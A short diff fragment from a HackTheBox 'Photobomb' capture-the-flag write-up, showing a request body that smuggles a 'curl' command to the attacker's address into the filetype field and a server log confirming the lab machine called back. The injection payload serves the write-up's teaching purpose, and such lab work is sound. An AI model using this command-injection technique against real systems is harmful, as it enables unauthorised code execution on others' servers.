n0sys/HackTheBox-WriteUp/HackTheBox-Photobomb/README.md

 photo=mark-mc-neill-4xWHIpY2QcY-unsplash.jpg&filetype=jpg%0acurl%2010.10.14.161:8000/&dimensions=30x20
 ```
-We captured it on our local server
+And we receive it on our local server!
 ```http
 [Wed Feb  1 13:29:17 2023] 10.10.11.182:57202 Accepted
 [Wed Feb  1 13:29:17 2023] 10.10.11.182:57202 [404]: GET / - No such file or directory